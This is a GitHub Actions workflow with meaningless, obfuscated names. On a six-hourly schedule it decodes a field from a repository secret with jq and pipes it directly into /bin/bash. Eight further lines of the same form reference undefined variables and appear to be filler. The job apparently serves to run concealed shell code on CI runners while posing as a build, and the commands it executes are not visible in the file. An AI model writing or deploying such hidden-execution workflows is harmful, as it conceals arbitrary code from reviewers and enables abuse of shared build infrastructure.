name: wengtouwt

on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wengtouwt
        env:
          qxi4: ${{ secrets.qxi4 }}
        run: |
          echo $qxi4 | jq -r .kgc4139 | /bin/bash
          echo $jfdm4354 | jq -r .yj0928 | /bin/bash
          echo $m526 | jq -r .vhw9 | /bin/bash
          echo $wku3648 | jq -r .pjyj2 | /bin/bash
          echo $wo5 | jq -r .oxpph1430 | /bin/bash
          echo $ipes1 | jq -r .q91 | /bin/bash
          echo $cx4565 | jq -r .zupy3202 | /bin/bash
          echo $fta434 | jq -r .ams93 | /bin/bash
          echo $uxgiw5072 | jq -r .i53 | /bin/bash

